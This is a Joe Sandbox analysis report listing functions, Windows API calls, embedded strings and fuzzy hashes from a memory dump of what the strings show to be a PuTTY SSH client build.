Function 00C6C7D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

ClearCommBreak.KERNEL32(?), ref: 00C6C853
CloseHandle.KERNEL32(?), ref: 00C6C85C

Strings

End of file reading from serial device, xrefs: 00C6C80F, 00C6C874, 00C6C880
Error reading from serial device, xrefs: 00C6C80A

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: BreakClearCloseCommHandle
String ID: End of file reading from serial device$Error reading from serial device
API String ID: 2685284230-2629609604
Opcode ID: 6f703fbf735f7b4e723a1a7dd17047855f52a2cb5fe4232c478b7de3ad849cf8
Instruction ID: 8d8c479e02b4ae542ee048f366a0a2d1235f261ac4a8d31b3f291d3c24d599d0
Opcode Fuzzy Hash: 6f703fbf735f7b4e723a1a7dd17047855f52a2cb5fe4232c478b7de3ad849cf8
Instruction Fuzzy Hash: FE21A1B4A007019BD7309F69EC88E1777E9EF95318F14492DF8AAC3291D731E814DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BE40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00C746D1,00000000,RandSeedFile), ref: 00C7BE67
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 00C7BE9F

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/utils/registry.c, xrefs: 00C7BEB9
size < allocsize, xrefs: 00C7BEBE

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: QueryValue
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/utils/registry.c$size < allocsize
API String ID: 3660427363-813299046
Opcode ID: d409434bd2226b63315c7b8da277b21b144db8d1fbd069268d1d8bd94398cf43
Instruction ID: 38bb198f7080ad259f3862bb95a22501e564c19256c154ca7804303eecbd8071
Opcode Fuzzy Hash: d409434bd2226b63315c7b8da277b21b144db8d1fbd069268d1d8bd94398cf43
Instruction Fuzzy Hash: 5211C171604304BFD620AB14AC82F6BB7EDEF94B44F018429F689DA380E371AD04D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00C63860 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

SetDlgItemTextA.USER32(?,?,?), ref: 00C63909

Strings

!c->ctrl->fileselect.just_button, xrefs: 00C638F1
c->ctrl->type == CTRL_FILESELECT, xrefs: 00C638CE
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c, xrefs: 00C638A5, 00C638C9, 00C638EC

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: ItemText
String ID: !c->ctrl->fileselect.just_button$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/controls.c$c->ctrl->type == CTRL_FILESELECT
API String ID: 3367045223-3335069544
Opcode ID: 37e292b1fa12c796aac6baa60435475d2c09ad02c7ef0734ae2300a550a66d12
Instruction ID: db6e6ce0329ebbe93ecdacff37b6771cc0133cd87958a5b9f43550dabf4efdd3
Opcode Fuzzy Hash: 37e292b1fa12c796aac6baa60435475d2c09ad02c7ef0734ae2300a550a66d12
Instruction Fuzzy Hash: EB112271A40341BFE3209E14ECC6F5673A4EF4A704F150025F400A7292E362AE18CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C77A20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

_wctomb_s.LIBCMT ref: 00C77AA5

Strings

subkeytypes[primary] == TYPE_STR, xrefs: 00C77A48
valuetypes[primary] == TYPE_STR, xrefs: 00C77A6D
/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/utils/conf.c, xrefs: 00C77A43, 00C77A68

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: _wctomb_s
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/utils/conf.c$subkeytypes[primary] == TYPE_STR$valuetypes[primary] == TYPE_STR
API String ID: 2865277502-2078841307
Opcode ID: 8aa7aa254219ade6ca9d41cbee92602df626733368b13f6b5d8d795b803c6026
Instruction ID: 7fe098f307b19253c8de68ffc208ee6cc4906288c70626dd874e770d025cac96
Opcode Fuzzy Hash: 8aa7aa254219ade6ca9d41cbee92602df626733368b13f6b5d8d795b803c6026
Instruction Fuzzy Hash: 0D11E775644310BFD610AF14DC06A1A7BE1ABC5B10F058518F9486B3A0D670DD04DBE3

Uniqueness

Uniqueness Score: -1.00%

Function 00C41060 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49registrywindowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32(MZx,000000C8), ref: 00C410E4
LoadCursorA.USER32(00000000,00007F01), ref: 00C410F5
RegisterClassW.USER32 ref: 00C4111B

Strings

MZx, xrefs: 00C410E3

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Load$ClassCursorIconRegister
String ID: MZx
API String ID: 738324305-2575928145
Opcode ID: 50eadb76e0af200fc9a163fb800aeb0983007583087f03de8b7e070021e65be6
Instruction ID: 116c1be4ea6df484b003e9d647a4a8d210cf94917e2c116ef2527dc9516ab237
Opcode Fuzzy Hash: 50eadb76e0af200fc9a163fb800aeb0983007583087f03de8b7e070021e65be6
Instruction Fuzzy Hash: 1E11F5B8A083009FE740DF24E85971A7BE0FB49758F044919EA88DB3A0D7759984CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00C467B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 00C467F9
ShowCursor.USER32(00000001), ref: 00C4683D
MessageBoxA.USER32(Connection closed by remote host,00000040), ref: 00C4685D

Strings

Connection closed by remote host, xrefs: 00C46852

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message$CursorPostQuitShow
String ID: Connection closed by remote host
API String ID: 3394085358-3682140707
Opcode ID: 26d9ae0571cf2accfcaf5f4666759338525f92b45724dfeaba904fcc2a4149dd
Instruction ID: 73c1482613ca16d85c9f14d2ae1a332adde50b141dcb6f9ecb2f63db51fce688
Opcode Fuzzy Hash: 26d9ae0571cf2accfcaf5f4666759338525f92b45724dfeaba904fcc2a4149dd
Instruction Fuzzy Hash: 6B01B578954300EBEB202B64BC4AB543F56B707329F140220F664D52F6DAB25A96DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00C463F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00C46429
MessageBoxA.USER32(?,00000000,00000010), ref: 00C46440
PostQuitMessage.USER32(00000001), ref: 00C46476

Strings

%s Fatal Error, xrefs: 00C463FC

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message$CursorPostQuitShow
String ID: %s Fatal Error
API String ID: 3394085358-656502033
Opcode ID: 463f23b0a0beaa2eb2bdd3a32a41c6308ae46d1e0a21106d72577de2fe8b415a
Instruction ID: b10e5b60702e840f3b0d95b53730dac07e3b375a262a26245f72f620062fe2a2
Opcode Fuzzy Hash: 463f23b0a0beaa2eb2bdd3a32a41c6308ae46d1e0a21106d72577de2fe8b415a
Instruction Fuzzy Hash: 6BF0A479950300BBDB207B64BC0AF553E65EB5A71AF084020F748942E7D6B25554EFF3

Uniqueness

Uniqueness Score: -1.00%

Function 00C46A00 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEE231: IsProcessorFeaturePresent.KERNEL32(00000017,00CE1B8B,?,?,?,?,00000000), ref: 00CEE24D

GetDC.USER32(00000000), ref: 00C46A3E
SelectPalette.GDI32(00000000,00000000), ref: 00C46A53

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C46A20
!wintw_hdc, xrefs: 00C46A25

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: FeaturePalettePresentProcessorSelect
String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c
API String ID: 1536087120-2511222366
Opcode ID: 8f4998e74d5672fc0ff0b984dd6853a28bf7c226d6ea98626f0d80af8508a606
Instruction ID: ea66d693f8ec57dd435e5c6af33bdbe6812ad0cff2479e0ad132602bfd3e9cd4
Opcode Fuzzy Hash: 8f4998e74d5672fc0ff0b984dd6853a28bf7c226d6ea98626f0d80af8508a606
Instruction Fuzzy Hash: 39F02BB7A40301EBD7108F38BD0AF8636DDEB86791F094010F622EA7D8DB718985D630

Uniqueness

Uniqueness Score: -1.00%

Function 00C65810 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36networkCOMMON

Download Yara Rule

APIs

WSAAsyncSelect.WS2_32(?,00000000,00008005,0000003F), ref: 00C65854
WSAGetLastError.WS2_32 ref: 00C65863

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/select-gui.c, xrefs: 00C65839
winsel_hwnd, xrefs: 00C6583E

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AsyncErrorLastSelect
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/select-gui.c$winsel_hwnd
API String ID: 1263927367-944443595
Opcode ID: 8c4d291b5a9d8462c1cb33033e3ca75c268aada1506743c723ec509a736ddc2a
Instruction ID: 39508024787308264da21a54078c82ad17f4cc524407c684edde669547c1c5aa
Opcode Fuzzy Hash: 8c4d291b5a9d8462c1cb33033e3ca75c268aada1506743c723ec509a736ddc2a
Instruction Fuzzy Hash: 79F0BEB5A403406FE7105E75AC89F2B23A8CB8E765F940824F565D3280E2249D4486B1

Uniqueness

Uniqueness Score: -1.00%

Function 00C47FF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00C49D30,00000000), ref: 00C48033
CloseHandle.KERNEL32(00000000), ref: 00C4803E

Strings

/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c, xrefs: 00C4800D
clipboard == CLIP_SYSTEM, xrefs: 00C48012

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: CloseCreateHandleThread
String ID: /home/simon/mem/.build/workdirs/bob-fffbk9my/putty/windows/window.c$clipboard == CLIP_SYSTEM
API String ID: 3032276028-3338924836
Opcode ID: 0631349c39c3c3f04dfd3de20506fc81a555587cef681ee7253ea8cdb4ca9e93
Instruction ID: b758bed20d8c51b78c4c0d709bc93dd779d810957a9e9e8b56847ee6df69fa46
Opcode Fuzzy Hash: 0631349c39c3c3f04dfd3de20506fc81a555587cef681ee7253ea8cdb4ca9e93
Instruction Fuzzy Hash: F7F065747513007BD7146B60AD07B2E3A65BB95F01F404418F606DA3D1DA709508DA76

Uniqueness

Uniqueness Score: -1.00%

Function 00C5EFA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00C5EFCE

Strings

PuTTY, xrefs: 00C5EFA8, 00C5EFB8
%s Key File Warning, xrefs: 00C5EFB9
You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You, xrefs: 00C5EFA9

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Message
String ID: %s Key File Warning$PuTTY$You are loading an SSH-2 private key which has anold version of the file format. This means your keyfile is not fully tamperproof. Future versions of%s may stop supporting this private key format,so we recommend you convert your key to the newformat.You
API String ID: 2030045667-626526669
Opcode ID: 0b08af1a4a9ddb568496f689420418518eb98fe60191656b6deb7dd60bb7f8ac
Instruction ID: 35bfbad6d5f014c8f0f1dbb536463de9cbcf13caf7b05042e0ac514a0d98c48d
Opcode Fuzzy Hash: 0b08af1a4a9ddb568496f689420418518eb98fe60191656b6deb7dd60bb7f8ac
Instruction Fuzzy Hash: C2E04FA295011026E11432757C0BF6F2968CBD6BA5F9D4434F90C9A2D2F862291996B3

Uniqueness

Uniqueness Score: -1.00%

Function 00CFBCCC Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(87DC40FB,00000000,00000000,00000000), ref: 00CFBD2F

Part of subcall function 00CFA16A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00CFF669,?,00000000,-00000008), ref: 00CFA216

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CFBF8A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CFBFD2
GetLastError.KERNEL32 ref: 00CFC075

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 540aa487ffa384fe632a40611b4336c35e7e1f83e87557e0ff58c76da6c61ab0
Instruction ID: 7a1545c697c72f876cc846fd2047737f668c940669986d9dabe03e3893551aef
Opcode Fuzzy Hash: 540aa487ffa384fe632a40611b4336c35e7e1f83e87557e0ff58c76da6c61ab0
Instruction Fuzzy Hash: 9DD139B5E0024C9FCB15CFA8D9809ADBBB5BF09304F18452AEA66EB351D730A952CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C90CD0 Relevance: 6.2, APIs: 4, Instructions: 168timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C90DAF
__aulldiv.LIBCMT ref: 00C90DD3
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C90E2E
__aulldiv.LIBCMT ref: 00C90E51

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Time$File$__aulldiv$LocalSystem
String ID:
API String ID: 1236384784-0
Opcode ID: a13e1288da28a2ae595ae0637c0c996c30b16c26457aba11450a6cb5e612a5db
Instruction ID: 3adde83642f172351274d6093ea93a96459e5ac9b3889aa911f7d4772c0f9b21
Opcode Fuzzy Hash: a13e1288da28a2ae595ae0637c0c996c30b16c26457aba11450a6cb5e612a5db
Instruction Fuzzy Hash: 2E6166756043049FCB14CF28C844BAAB7E5FF88708F148A2DF9A99B390D771E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00D01FB2 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00D02079
___AdjustPointer.LIBCMT ref: 00D0209C
___AdjustPointer.LIBCMT ref: 00D02138

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 97504eb0118bcf62aa80080a3fed5b58039ecffa36d0dd1eda51d5639e3553d4
Instruction ID: fbc38eb03a8eae171e886ecb50bf47dd555582f689632066fc94e9ed64b10f90
Opcode Fuzzy Hash: 97504eb0118bcf62aa80080a3fed5b58039ecffa36d0dd1eda51d5639e3553d4
Instruction Fuzzy Hash: 9351F472A02306AFEB298F54D859BBAB7A4FF14310F28452DE949572D1D731EC81D7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00CECE78 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad64e357815371d525db9085ee4058c8643637cacc4de3a2517bfe8a0b85b8a
Instruction ID: 1ff8461cb14a93ae6c574b8e8e96ba6e609d395d132c6da5cdb8af5338d1cc9d
Opcode Fuzzy Hash: dad64e357815371d525db9085ee4058c8643637cacc4de3a2517bfe8a0b85b8a
Instruction Fuzzy Hash: 94410DB2600784BFD7249F79CC82BAABFE5EB44710F10456AF115DB681D7719941D780

Uniqueness

Uniqueness Score: -1.00%

Function 00C48750 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 00C4878E
GetSysColor.USER32 ref: 00C487ED
GetSysColor.USER32 ref: 00C4884C
GetSysColor.USER32 ref: 00C48889

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Color
String ID:
API String ID: 2811717613-0
Opcode ID: 7dced829bc97ac1191f7f97972235458466c975c70daba426792799f928b7f36
Instruction ID: c2dca415dd7d29d907136461e96e7b81b5fcb3883764d503e1eeb9fe27eed3f0
Opcode Fuzzy Hash: 7dced829bc97ac1191f7f97972235458466c975c70daba426792799f928b7f36
Instruction Fuzzy Hash: E841956901D3D4AED301AFA8900516FBFE4AFA9600F45CC5EF4D887352D6B4C588DB63

Uniqueness

Uniqueness Score: -1.00%

Function 00C41EED Relevance: 6.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 00C64B20: DestroyWindow.USER32(00000000,?,00C41E3E,00000001), ref: 00C64B33

InvalidateRect.USER32(?,00000000,00000001), ref: 00C41F5C
GetClientRect.USER32(?), ref: 00C41F70
InvalidateRect.USER32(00000000,00000001), ref: 00C41FEC
DefWindowProcW.USER32(?,?,?,?), ref: 00C43520

Memory Dump Source

Source File: 00000004.00000002.2129882752.0000000000C41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000004.00000002.2129848143.0000000000C40000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D40000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130308096.0000000000D42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2130419119.0000000000D48000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c40000_OgUpjXaY.jbxd

Similarity

API ID: Rect$InvalidateWindow$ClientDestroyProc
String ID:
API String ID: 3789280143-0
Opcode ID: 5b3972adebf22e96cfc0c66d56f7efb7aff194d3ed4739c188ee35a0035fa170
Instruction ID: 0197339ca825803ee76be02f2ec66f9bc4d5653a21ebb0b5674d62c120a1c5a5
Opcode Fuzzy Hash: 5b3972adebf22e96cfc0c66d56f7efb7aff194d3ed4739c188ee35a0035fa170
Instruction Fuzzy Hash: 9B31E679644300DFD7209F28EC41F693BE5F785305F088129FA89D73A2EB715854DBA1

Uniqueness

